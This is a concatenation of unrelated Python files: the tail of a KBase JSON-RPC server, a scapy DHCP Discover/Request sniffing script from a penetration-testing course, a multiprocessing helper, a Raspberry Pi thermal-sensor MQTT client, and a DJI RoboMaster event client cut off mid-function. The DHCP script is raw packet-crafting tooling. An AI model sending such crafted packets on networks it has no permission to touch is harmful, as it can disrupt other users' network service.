submod = get_service_name() or 'kbdeleonContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kbdeleonContigFilter.run_kbdeleonContigFilter,
name='kbdeleonContigFilter.run_kbdeleonContigFilter',
types=[dict])
self.method_authentication['kbdeleonContigFilter.run_kbdeleonContigFilter'] = 'required' # noqa
self.rpc_service.add(impl_kbdeleonContigFilter.run_kbdeleonContigFilter_max,
name='kbdeleonContigFilter.run_kbdeleonContigFilter_max',
types=[dict])
self.method_authentication['kbdeleonContigFilter.run_kbdeleonContigFilter_max'] = 'required' # noqa
self.rpc_service.add(impl_kbdeleonContigFilter.status,
name='kbdeleonContigFilter.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kbdeleonContigFilter ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
DHCP_FULL.py
|
#!/usr/bin/python3.4
# -*- coding=utf-8 -*-
#本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
#教主QQ:605658506
#亁颐堂官网www.qytang.com
#乾颐盾是由亁颐堂现任明教教主开发的综合性安全课程
#包括传统网络安全(防火墙,IPS...)与Python语言和黑客渗透课程!
import sys
sys.path.append('/usr/local/lib/python3.4/dist-packages/PyQYT/ExtentionPackages')
sys.path.append('/usr/lib/python3.4/site-packages/PyQYT/ExtentionPackages')
sys.path.append('../../ExtentionPackages')
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)#清除报错
from scapy.all import *
import multiprocessing
import struct
from PyQYT.Network.Tools.Change_MAC_To_Bytes import Change_MAC_To_Bytes
from PyQYT.Network.Tools.GET_MAC import GET_MAC
from PyQYT.Network.Tools.Change_Chaddr_To_MAC import Change_Chaddr_To_MAC
from DHCP_Discover import DHCP_Discover_Sendonly
from DHCP_Request import DHCP_Request_Sendonly
def DHCP_Monitor_Control(pkt):
try:
if pkt.getlayer(DHCP).fields['options'][0][1]== 1:#发现并且打印DHCP Discover
print('发现DHCP Discover包,MAC地址为:',end='')
MAC_Bytes = pkt.getlayer(BOOTP).fields['chaddr']
MAC_ADDR = Change_Chaddr_To_MAC(MAC_Bytes)
print(MAC_ADDR)
print('Request包中发现如下Options:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
elif pkt.getlayer(DHCP).fields['options'][0][1]== 2:#发现并且打印DHCP OFFER
options = {}
MAC_Bytes = pkt.getlayer(BOOTP).fields['chaddr']
MAC_ADDR = Change_Chaddr_To_MAC(MAC_Bytes)
#把从OFFER得到的信息读取并且写入options字典
options['MAC'] = MAC_ADDR
options['client_id'] = Change_MAC_To_Bytes(MAC_ADDR)
print('发现DHCP OFFER包,请求者得到的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr'])
print('OFFER包中发现如下Options:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
options['requested_addr'] = pkt.getlayer(BOOTP).fields['yiaddr']
for i in pkt.getlayer(DHCP).fields['options']:
if i[0] == 'server_id' :
options['Server_IP'] = i[1]
Send_Request = multiprocessing.Process(target=DHCP_Request_Sendonly, args=(Global_IF,options))
Send_Request.start()
elif pkt.getlayer(DHCP).fields['options'][0][1]== 3:#发现并且打印DHCP Request
print('发现DHCP Request包,请求的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr'])
print('Request包中发现如下Options:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
elif pkt.getlayer(DHCP).fields['options'][0][1]== 5:#发现并且打印DHCP ACK
print('发现DHCP ACK包,确认的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr'])
print('ACK包中发现如下Options:')
for option in pkt.getlayer(DHCP).fields['options']:
if option == 'end':
break
print('%-15s ==> %s' %(str(option[0]),str(option[1])))
except Exception as e:
print(e)
pass
def DHCP_FULL(ifname, MAC, timeout = 10):
global Global_IF
Global_IF = ifname
Send_Discover = multiprocessing.Process(target=DHCP_Discover_Sendonly, args=(Global_IF,MAC))
Send_Discover.start()
sniff(prn=DHCP_Monitor_Control, filter="port 68 and port 67", store=0, iface=Global_IF, timeout = timeout)
if __name__ == '__main__':
ifname = 'eno33554944'
DHCP_FULL('eno33554944', GET_MAC(ifname))
|
MultiprocessingWithException.py
|
import multiprocessing as mp
import traceback
from typing import Optional, Tuple
class ProcessWithException(mp.Process):
"""
to be treated same as usual multiprocessing process, with
p = Process(target=target, args=args)
p.start()
p.join()
p.print_and_raise_if_has_exception()
extended from stack overflow https://stackoverflow.com/a/33599967/11837276
"""
_exception: Optional[Tuple[Exception, str]]
def __init__(self, *args, **kwargs):
mp.Process.__init__(self, *args, **kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
def run(self):
try:
mp.Process.run(self)
self._cconn.send(None)
except Exception as e:
tb = traceback.format_exc()
self._cconn.send((e, tb))
# raise e # You can still rise this exception if you need to
@property
def exception(self) -> Tuple[Exception, str]:
if self._pconn.poll():
self._exception = self._pconn.recv()
return self._exception
def print_and_raise_if_has_exception(self):
if self.exception is None:
return
print("=" * 30 + "\n")
print("=" * 30 + "\n")
print("=" * 30 + "\n")
print(self.exception[1])
raise self.exception[0]
|
main.py
|
import asyncio
import math
import sys
import time
import pdb
from multiprocessing import Process, Queue
import numpy as np
import serial
import adafruit_mlx90640
import board
import busio
import main
from file_utils import create_folder_if_absent, save_npy
from visualizer import init_heatmap, update_heatmap
from centroid_history import displacement_history
from socket import *
from struct import pack
import json
# load config
import os
import sys
curr_dir = os.path.dirname(os.path.realpath(__file__))
config_dir = os.path.join(curr_dir, "config.json")
with open(config_dir, "r") as readfile:
global config
config = json.loads(readfile.read())
BAUD_RATE = 115200
ARRAY_SHAPE = (24, 32)
TCP_addr = config["mlx_nuc_ip_to_send_json"]
broker = config["mqtt_broker_ip"]
port = config["mqtt_broker_port"]
RPI_ROOM_TYPE = config["room_type"]
data_collection_process = None # placeholder to contain process that colelcts data
i2c = busio.I2C(board.SCL, board.SDA, frequency=400000) # setup I2C
mlx = adafruit_mlx90640.MLX90640(i2c) # begin MLX90640 with I2C comm
mlx.refresh_rate = adafruit_mlx90640.RefreshRate.REFRESH_2_HZ # set refresh
data = Queue()
data_times = Queue()
class ClientProtocol:
def __init__(self):
self.socket = None
def connect(self, server_ip, server_port):
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.connect((server_ip, server_port))
print("Connected to TCP Server")
def close(self):
self.socket.shutdown(SHUT_WR)
self.socket.close()
self.socket = None
def send_data(self, data):
# use struct to make sure we have a consistent endianness on the length
length = pack('>Q', len(data))
# sendall to make sure it blocks if there's back-pressure on the socket
self.socket.sendall(length)
self.socket.sendall(data)
ack = self.socket.recv(1)
cp = ClientProtocol()
def interpolate_values(df):
"""
:param: 24x32 data frame obtained from get_nan_value_indices(df)
:return: 24x32 array
"""
nan_value_indices = np.argwhere(np.isnan(df))
x_max = df.shape[0] - 1
y_max = df.shape[1] - 1
for indx in nan_value_indices:
x = indx[0]
y = indx[1]
if x == 0 and y == 0:
df[x][y] = (df[x + 1][y] + df[x][y + 1]) / 2
elif (x == x_max and y == y_max):
df[x][y] = (df[x - 1][y] + df[x][y - 1]) / 2
elif (x == 0 and y == y_max):
df[x][y] = (df[x + 1][y] + df[x][y - 1]) / 2
elif (x == x_max and y == 0):
df[x][y] = (df[x - 1][y] + df[x][y + 1]) / 2
elif (x == 0):
df[x][y] = (df[x + 1][y] + df[x][y - 1] + df[x][y + 1]) / 3
elif (x == x_max):
df[x][y] = (df[x - 1][y] + df[x][y - 1] + df[x][y + 1]) / 3
elif (y == 0):
df[x][y] = (df[x + 1][y] + df[x - 1][y] + df[x][y + 1]) / 3
elif (y == y_max):
df[x][y] = (df[x - 1][y] + df[x + 1][y] + df[x][y - 1]) / 3
else:
df[x][y] = (df[x][y + 1] + df[x + 1][y] + df[x - 1][y] + df[x][y - 1]) / 4
return df
def collect_data(data):
frame = [0] * 768
counter = 0
while True:
try:
mlx.getFrame(frame) # get the mlx values and put them into the array we just created
array = np.array(frame)
if np.sum(array) > 0:
df = np.reshape(array.astype(float), ARRAY_SHAPE)
df = interpolate_values(df)
data.put(df)
print("Frame collected [{}]".format(counter))
counter += 1
except ValueError:
# these happen, no biggie - retry
print("ValueError during data collection")
pass
except InterruptedError:
pass
# print("Stopping data collection..., num frames collected: {}".format(len(data)))
def on_message(client,userdata, msg):
try:
global data_collection_process
m_decode=str(msg.payload.decode("utf-8","ignore"))
"""
# debug message
print("=============================")
print("message received for {}!".format(RPI_ROOM_TYPE))
print("msg: {0}".format(m_decode))
"""
# check topic
topic=msg.topic
# print("Topic: " + topic)
sensor_type, house_id = topic.split("/")
# print("Sensor Type: {}, House_ID: {}".format(sensor_type, house_id))
# print("data_collection_process: {0}".format(data_collection_process))
# check decoded message content and change current MLX shown
if m_decode == RPI_ROOM_TYPE and not data_collection_process:
print("start mlx collection")
# spawns parallel process to write sensor data to .npy files
start_time = time.strftime("%Y.%m.%d_%H%M%S",time.localtime(time.time()))
data_times.put(start_time)
data_collection_process = Process(target=main.collect_data, args=(data, ))
data_collection_process.start()
elif data_collection_process:
print("end mlx collection")
data_collection_process.terminate()
data_collection_process = None
end_time = time.strftime("%Y.%m.%d_%H%M%S",time.localtime(time.time()))
collected_data = []
while not data.empty():
try:
collected_data.append(data.get())
except Exception as e:
print(e)
break
# print("Sending data array of length: {}".format(len(data)))
start_time = data_times.get()
print("Data collection started at {}, and ended at {}".format(start_time,end_time))
# pdb.set_trace()
print("len(collected_data): {0}".format(len(collected_data)))
if len(collected_data) != 0:
analysis_result = displacement_history(collected_data, start_time, end_time)
analysis_result["room_type"] = RPI_ROOM_TYPE
print("analysis_result: {0}".format(analysis_result))
to_send = json.dumps(analysis_result)
byte_data = to_send.encode("utf-8")
cp.connect(TCP_addr, config["mlx_nuc_port_to_send_json"])
print("len(byte_data): {0}".format(len(byte_data)))
cp.send_data(byte_data)
cp.close()
start_time = None
end_time = None
collected_data.clear()
print("Resetted data array, now length: {}".format(len(collected_data)))
except InterruptedError:
if data_collection_process:
data_collection_process.terminate()
exit(0)
except Exception as e:
print(e)
pdb.set_trace()
def on_connect(client, userdata, flags, rc):
if rc == 0:
print ("Connection OK!")
else:
print("Bad connection, Returned Code: ", rc)
def on_disconnect(client, userdata, flags, rc=0):
print("Disconnected result code " + str(rc))
import paho.mqtt.client as mqtt
client = mqtt.Client()
client.connect(config["mqtt_broker_ip"], config["mqtt_broker_port"])
client.subscribe(topic=config["mlx_topic_to_listen"])
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = on_message # makes it so that the callback on receiving a message calls on_message() above
client.publish(config["mlx_topic_to_publish"], "Rpi operational!")
try:
client.loop_forever()
except Exception as e:
print(e)
"""
except InterruptedError as e:
if data_collection_process:
data_collection_process.terminate()
"""
|
event_client.py
|
import traceback
import duml_cmdset
import duss_event_msg
import rm_define
import rm_log
import socket
import sys
import threading
import time
import tools
import user_script_ctrl
logger = rm_log.dji_scratch_logger_get()
default_target_address = '\0/duss/mb/0x900'
DUSS_EVENT_MSG_HEADER_LEN = 4
class EventAckIdentify(object):
def __init__(self):
self.valid = False
self.identify = 0
self.wait_ack_event = threading.Event()
class EventClient(object):
DEFAULT_ROUTE_FILE = '/system/etc/dji.json'
def __init__(self, host_id=rm_define.script_host_id):
self.debug = False
self.route_table, _, _ = tools.load_route_table(EventClient.DEFAULT_ROUTE_FILE, 'scratch_service',
'scratch_client')
self.my_server_address = '\0/duss/mb/' + str(hex(host_id))
self.my_host_id = host_id
self.wait_ack_list = {}
self.wait_ack_mutex = threading.Lock()
self.wait_ack_event_list = []
self.cur_task_attri = {}
self.finish = False
self.script_state = user_script_ctrl.UserScriptCtrl()
self.async_req_cb_list = {}
self.async_ack_cb_list = {}
self.event_process_mutex = threading.Lock()
self.event_process_list = {}
self.event_callback_list = {}
self.event_notify_mutex = threading.Lock()
self.event_notify_list = {}
self.event_notify_not_register_dict = {}
self.event_process_flag = False
self.async_cb_mutex = threading.Lock()
self.check_event_msg_invalid_callback = None
self.already_finish_task_identify_set = set()
self.task_push_cmdid_list = []
for i in range(1, 9):
ackIdentify = EventAckIdentify()
self.wait_ack_event_list.append(ackIdentify)
logger.info('WAIT ACK EVENT LIST LEN = ' + str(len(self.wait_ack_event_list)))
self.socketfd = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
self.my_server = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
self.my_server.bind(self.my_server_address)
self.recv_thread = threading.Thread(target=self.__recv_task)
self.recv_thread.start()
except Exception as e:
logger.fatal('EventClient: server error, message: ')
logger.fatal('TRACEBACK:\n' + traceback.format_exc())
sys.exit(-1)
def stop(self):
logger.info('EventClient: STOP')
self.finish = True
# send something to quit.
self.send2myself('quit')
self.recv_thread.join(3)
logger.info('EventClient: recv thread alive = ' + str(self.recv_thread.isAlive()))
self.socketfd.close()
self.my_server.close()
logger.info('EventClient host id = ' + str(self.my_host_id) + ' Exit!!!')
def __recv_task(self):
logger.info('START RECVING TASK...')
while self.finish == False:
recv_buff, host = self.my_server.recvfrom(1024)
if self.finish:
logger.info('EventClient: NEED QUIT!')
break
if recv_buff == None:
logger.fatal('FATAL ERROR RECV BUFF = NONE!!!')
continue
# pack.unpack -> EventMsg.
msg = duss_event_msg.unpack(recv_buff)
if msg == None:
continue
# whether task push msg
if msg['cmd_set'] == duml_cmdset.DUSS_MB_CMDSET_RM:
if msg['cmd_id'] in self.task_push_cmdid_list:
msg['task_id'] = msg['data'][0]
task_identify = str(msg['cmd_set']) + str(msg['cmd_id']) + str(msg['task_id'])
self.task_sync_process(task_identify, msg)
continue
# handle_one_message()
if msg['ack'] == True:
identify = str(msg['sender']) + str(msg['cmd_set']) + str(msg['cmd_id']) + str(msg['seq_num'])
# logger.info('GET ACK MSG: identify = ' + identify)
self.wait_ack_mutex.acquire()
if identify in self.wait_ack_list.keys():
for j in range(0, len(self.wait_ack_event_list)):
if self.wait_ack_event_list[j].valid and self.wait_ack_event_list[j].identify == identify:
self.wait_ack_list[identify] = msg
self.wait_ack_event_list[j].wait_ack_event.set()
else:
pass
# logger.warn('SENDER = ' + str(msg['sender']) + ' CMDSET = ' + str(hex(msg['cmd_set'])) + ' CMDID = ' + str(hex(msg['cmd_id']) + str(msg)) + ' NOT IN WAIT ACK LIST!!!')
self.wait_ack_mutex.release()
# TODO self.async_ack_cb_list
cmd_set_id = msg['cmd_set'] << 8 | msg['cmd_id']
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_ack_cb_list.keys():
# logger.info('ASYNC ACK MSG = ' + str(cmd_set_id) + ' HANDLE.')
self.async_ack_cb_list[cmd_set_id](self, msg)
self.async_cb_mutex.release()
else:
# TODO self.async_req_cb_list
cmd_set_id = msg['cmd_set'] << 8 | msg['cmd_id']
# if msg['cmd_set'] != 0x04:
# logger.info('CMD SETID = ' + str(cmd_set_id))
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_req_cb_list.keys():
# logger.info('ASYNC MSG = ' + str(cmd_set_id) + ' HANDLE.')
for cb in self.async_req_cb_list[cmd_set_id]:
cb(self, msg)
else:
logger.warn(
'UNSUPPORT MSG CMD SET = ' + str(hex(msg['cmd_set'])) + ', CMD ID = ' + str(hex(msg['cmd_id'])))
self.async_cb_mutex.release()
logger.info('RECV TASK FINISH!!!')
def send(self, data, target_address):
try:
self.socketfd.sendto(data, target_address)
except:
return duml_cmdset.DUSS_MB_RET_ACK
def send2myself(self, data):
try:
self.socketfd.setblocking(0)
self.socketfd.sendto(data.encode('utf-8'), '\0/duss/mb/' + str(hex(self.my_host_id)))
except Exception as e:
logger.error('EVENT_CLIENT: send2myself() error, message: ')
logger.error(traceback.logger.info_exc())
def is_wait(self):
return False
##############################################################################################
# TODO return value, if callback is already exist, support multip callback?
def async_req_register(self, cmd_set_id, callback):
logger.info('ASYNC REGISTER CMD_SETID = ' + str(hex(cmd_set_id)))
self.async_cb_mutex.acquire()
if cmd_set_id not in self.async_req_cb_list.keys():
self.async_req_cb_list[cmd_set_id] = []
if cmd_set_id not in self.async_req_cb_list[cmd_set_id]:
self.async_req_cb_list[cmd_set_id].append(callback)
self.async_cb_mutex.release()
def async_req_unregister(self, cmd_set_id, cb=None):
logger.info('ASYNC UNREGISTER CMD_SETID = ' + str(cmd_set_id))
self.async_cb_mutex.acquire()
if cb != None:
if cmd_set_id in self.async_req_cb_list.keys() and cb in self.async_req_cb_list[cmd_set_id]:
self.self.async_req_cb_list[cmd_set_id].remove(cb)
elif cmd_set_id in self.async_req_cb_list.keys():
self.async_req_cb_list.pop(cmd_set_id)
self.async_cb_mutex.release()
def async_ack_register(self, cmd_set_id, callback):
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_req_cb_list.keys():
self.async_ack_cb_list[cmd_set_id] = callback
self.async_cb_mutex.release()
def async_ack_unregister(self, cmd_set_id, callback):
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_ack_cb_list.keys():
self.async_ack_cb_list.pop(cmd_set_id)
self.async_cb_mutex.release()
def event_notify_register(self, event_name, robot_event):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_not_register_dict.keys() and time.time() - \
self.event_notify_not_register_dict[event_name] < 5:
robot_event.notify_for_task_complete()
self.event_notify_not_register_dict.pop(event_name)
else:
self.event_notify_list[event_name] = robot_event
self.event_notify_mutex.release()
def event_notify(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
robot_event = self.event_notify_list[event_name]
robot_event.notify_for_task_complete()
else:
self.event_notify_not_register_dict[event_name] = time.time()
self.event_notify_mutex.release()
def event_watchdog_set(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
robot_event = self.event_notify_list[event_name]
robot_event.watchdog_set()
self.event_notify_mutex.release()
def event_notify_unregister(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
self.event_notify_list.pop(event_name)
self.event_notify_mutex.release()
def event_callback_register(self, event_name, callback):
self.event_process_mutex.acquire()
self.event_callback_list[event_name] = callback
self.event_process_list[event_name] = {'callback': None, 'callback_data': None}
self.event_process_mutex.release()
def event_come_to_process(self, event_name, callback_data=None):
self.event_process_mutex.acquire()
if event_name in self.event_callback_list.keys():
self.event_process_list[event_name]['callback'] = self.event_callback_list[event_name]
self.event_process_list[event_name]['callback_data'] = callback_data
else:
logger.error('EVENTCTRL: NO CB REGISTER, FUNC IS %s', event_name)
self.event_process_mutex.release()
def wait_for_event_process(self, func_before_event):
callback_list = []
# append the event to list
self.event_process_mutex.acquire()
for (event_name, callback_items) in self.event_process_list.items():
if callback_items['callback'] != None and callback_items['callback'].__name__ != 'dummy_callback':
callback_list.append(callback_items)
self.event_process_list[event_name] = {'callback': None, 'callback_data': None}
self.event_process_mutex.release()
# no event need to prcess or has event being processing
if len(callback_list) <= 0 or self.event_process_flag:
return False
# exec func before process event
if func_before_event != None:
func_before_event()
# set event process flag to true
self.event_process_flag = True
for item in callback_list:
func = item['callback']
data = item['callback_data']
func(data)
self.event_process_flag = False
return True
def ack_register_identify(self, event_msg):
self.wait_ack_mutex.acquire()
identify = str(event_msg.receiver) + str(event_msg.cmd_set) + str(event_msg.cmd_id) + str(event_msg.seq_num)
# logger.info('ACK REGISTER IDENTIFY = ' + identify)
self.wait_ack_list[identify] = True
self.wait_ack_mutex.release()
return identify
def ack_unregister_identify(self, identify):
resp = {}
self.wait_ack_mutex.acquire()
if identify in self.wait_ack_list.keys():
resp = self.wait_ack_list.pop(identify)
self.wait_ack_mutex.release()
return resp
# return duss_result
def send_msg(self, event_msg):
try:
if self.debug:
logger.info(str(event_msg.data))
target_address = default_target_address
if event_msg.receiver in self.route_table.keys():
target_address = self.route_table[event_msg.receiver]['target_address']
if event_msg.cmd_type & duml_cmdset.NEED_ACK_TYPE:
event_msg.cmd_type &= ~duml_cmdset.NO_ACK_TYPE
data = event_msg.pack()
self.send(data, target_address)
except Exception as e:
logger.fatal("Exception in send_msg, " + traceback.format_exc())
return rm_define.DUSS_ERR_FAILURE
return rm_define.DUSS_SUCCESS
# return duss_result, resp
def send_sync(self, event_msg, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
# logger.info('RECEIVER = ' + str(event_msg.receiver) + ', CMDSET = ' + str(hex(event_msg.cmd_set)) + ', CMDID = ' + str(hex(event_msg.cmd_id)))
duss_result = rm_define.DUSS_SUCCESS
check_result, invalid_code = self.check_event_msg_invalid(event_msg)
if check_result == True:
logger.warn('RECEIVER %d, MODULE ID %d, OFFLINE OR ERROR %s' % (
event_msg.receiver, event_msg.module_id, invalid_code))
return invalid_code, None
if event_msg.cmd_type & duml_cmdset.NEED_ACK_TYPE:
identify = self.ack_register_identify(event_msg)
j = 0
for j in range(0, len(self.wait_ack_event_list)):
if not self.wait_ack_event_list[j].valid:
# logger.info('VALID INDEX = ' + str(j))
break
self.wait_ack_event_list[j].valid = True
self.wait_ack_event_list[j].identify = identify
self.wait_ack_event_list[j].wait_ack_event.clear()
self.send_msg(event_msg)
# TODO EVENT_AUTOCLEAR need event.wait with flag
self.wait_ack_event_list[j].wait_ack_event.wait(time_out)
if not self.wait_ack_event_list[j].wait_ack_event.isSet():
duss_result = rm_define.DUSS_ERR_TIMEOUT
logger.warn(
'CMDSET = ' + str(hex(event_msg.cmd_set)) + ', CMDID = ' + str(hex(event_msg.cmd_id)) + ' TIMEOUT')
self.wait_ack_event_list[j].valid = False
resp = self.ack_unregister_identify(identify)
return duss_result, resp
else:
self.send_msg(event_msg)
return duss_result, None
# return duss_result
def send_task_async(self, event_msg, event_task, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
if event_task['cmd_id'] not in self.task_push_cmdid_list:
self.task_push_cmdid_list.append(event_task['cmd_id'])
identify = str(event_task['cmd_set']) + str(event_task['cmd_id']) + str(event_task['task_id'])
duss_result, resp = self.send_sync(event_msg, time_out)
# TODO process duss_result
if duss_result != rm_define.DUSS_SUCCESS:
logger.error('EVENT: send task %s, error code = %d' % (identify, duss_result))
return duss_result, identify
if resp['data'][0] == duml_cmdset.DUSS_MB_RET_OK:
if resp['data'][1] == 0:
logger.info('TASK ID = ' + str(event_task['task_id']) + ' ACCEPTED')
duss_result = rm_define.DUSS_SUCCESS
elif resp['data'][1] == 1:
logger.info('TASK ID = ' + str(event_task['task_id']) + ' REJECTED')
duss_result = rm_define.DUSS_TASK_REJECTED
elif resp['data'][1] == 2:
